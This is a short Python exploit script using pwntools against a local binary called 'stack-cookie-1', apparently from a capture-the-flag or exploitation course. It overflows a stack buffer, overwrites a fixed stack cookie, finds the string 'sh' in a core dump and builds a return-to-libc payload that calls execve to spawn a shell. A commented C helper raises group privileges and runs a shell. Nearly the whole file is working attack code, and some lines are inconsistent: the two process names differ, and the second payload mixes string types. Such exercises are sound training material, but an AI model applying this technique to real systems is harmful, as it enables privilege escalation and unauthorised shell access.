#!/usr/bin/env python

from pwn import *

p = process("./3-stack-cookie-1")

#
# Check the buffer information from gdb.
#
# Buffer = -0x88(%ebp)
# Cookie = -0x4(%ebp)
# Cookie - Buffer = 0x84
# [ BUFFER 0x84 ] [COOKIE] [Saved ebp] [retaddr]

# get the address of execve from 'print execve' on gdb.
execve = 0xf7eb27e0

# match the cookie, and intentionally generate a crash to get the address of
# 'sh'
payload = cyclic(0x84) + p32(0xfaceb00c) + b"CCCC" + b"XXXX"

p.send(payload)

print(p.recv(0x100))
p.wait()


c = Core('core')

addr_of_sh = c.stack.find('sh')

# launch execve("sh", 0, 0)
# you should create a file sh here... you can do it by compiling the following
# code and set its name as sh
# int main() {
#     setregid(getegid(), getegid());
#     system("sh");
# }
p = process("./stack-cookie-1")

# calling execve("sh", 0, 0);
payload = cyclic(0x84) + p32(0xfaceb00c) + "CCCC" + p32(execve) + "DDDD" + p32(addr_of_sh) + p32(0) + p32(0)

p.send(payload)

p.interactive()